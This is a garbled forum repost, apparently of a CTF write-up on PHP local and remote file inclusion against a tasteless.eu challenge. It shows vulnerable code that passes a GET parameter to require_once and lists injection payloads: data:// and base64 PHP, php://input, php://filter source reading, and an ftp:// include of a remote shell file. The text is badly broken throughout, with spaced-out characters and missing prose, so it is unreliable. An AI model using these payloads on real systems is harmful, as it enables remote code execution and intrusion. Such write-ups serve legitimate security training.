[21099] 2020-06-22_CTF文件包含与伪协议

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2020-06-22_CTF文件包含与伪协议 C T F   L e m o n S e c   2 0 2 0 - 0 6 - 2 2     C T F C T F 姿 h t t p : / / w w w . f r e e b u f . c o m / c o l u m n / 1 5 0 0 2 8 . h t m l         c h a l l e n g e s h t t p : / / c h a l l . t a s t e l e s s . e u / h t t p : / / l e v e l 3 . t a s t e l e s s . e u /                     C T F W E B 1 h i g h l i g h t _ f i l e ( )   i n d e x . p h p 2 a n t i _ r f i . p h p 3 使 r e q u i r e _ o n e G E T f i l e 4 P H P . i n i   p h p . i n i a n t i _ r f i . p h p p h p . i n i h t t p : / / l e v e l 3 . t a s t e l e s s . e u / p h p . i n i , c t r l + f   a l l o w < ? p h p h i g h l i g h t _ f i l e ( ' i n d e x . p h p ' ) ; / * v i e w   f i l e :   p h p . i n i s o   h e r e   i s   m y   h i n t :   t h e   i n c l u d e d   p h p . i n i   f i l e   i s   p a r t   o f   t h e   c o n f i g u g a r t i o n   f i l e   u s e d   o n   t h e   s e r v e r   t h e   b u g   w a s   f o u n d . s o   t h e r e   w i l l   b e   s o m e t h i n g   i n   i t   w h i c h   e n a b l e s   y o u   t o   s o l v e   t h i s   l e v e l ,   w o n t ? a l w a y s   b e   U P   T O   D A T E ! h i n t   e n o u g h ,   m i g h t   j u s t   t a k e   y o u   s e c o n d s   t o   d o ? ! * / e r r o r _ r e p o r t i n g ( 0 ) ; i n c l u d e ( ' a n t i _ r f i . p h p ' ) ;   / / r f i   i s   f o r b i d d e n ! ! ! ! ! $ i n c   =   @ $ _ G E T [ ' f i l e ' ] ; @ r e q u i r e _ o n c e ( $ i n c ) ; ? >
p h p . i n i a l l o w _ u r l _ i n c l u d e o n 使 P H P 使 p h p : / / i n p u t a l l o w _ u r l _ f o p e n o f f 使 f l a g
/ v a r / w w w / c h a l l / l e v e l 3 P H P s c a n d i r ( ) < ? p h p   p r i n t _ r ( s c a n d i r ( ' / v a r / w w w / c h a l l / l e v e l 3 ' ) ) ? > t h 3 _ f 1 4 g 访 h t t p : / / l e v e l 3 . t a s t e l e s s . e u / t h 3 _ f l 4 g f l a g 3 1 .
2 . a l l o w _ u r l _ f o p e n a l l o w _ u r l _ i n c l u d e 使 3 . 使 f l a g a l l o w _ u r l _ f o p e n a l l o w _ u r l _ i n c l u d e p h a r z i p   P H P   1 . ? f i l e = d a t a : t e x t / p l a i n , < ? p h p   p h p i n f o ( ) ? > 2 . ? f i l e = d a t a : t e x t / p l a i n ; b a s e 6 4 , P D 9 w a H A g c G h w a W 5 m b y g p P z 4 = 3 . ? f i l e = p h p : / / i n p u t   [ P O S T   D A T A : ] < ? p h p   p h p i n f o ( ) ? > 4 . ? f i l e = p h p : / / f i l t e r / r e a d = c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = x x x . p h p a l l o w _ u r l _ f o p e n o f f 使 O N 使 a n t i _ r f i . p h p   , 使 h t t p : / / l e v e l 3 . t a s t e l e s s . e u / i n d e x . p h p ? f i l e = p h p : / / i n p u t           < ? p h p   h i g h l i g h t _ f i l e ( a n t i _ r f i . p h p ) ? > a n t i _ r f i . p h p 使 h t t p : / / ,   d a t a   h a c k e r   d e t e c t e d f t p : / / 使 f t p : / / a l l o w _ u r l _ f o p e n = O n   a l l o w _ u r l _ i n c l u d e = O n 使 f t p p a y l o a d i n d e x . p h p ? f i l e = f t p : / / w w w . s h e l l . c o m / s h e l l . t x t h t t p s : / / w w w . c n b l o g s . c o m / O r a n 9 e / p / 7 7 9 5 0 5 7 . h t m l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则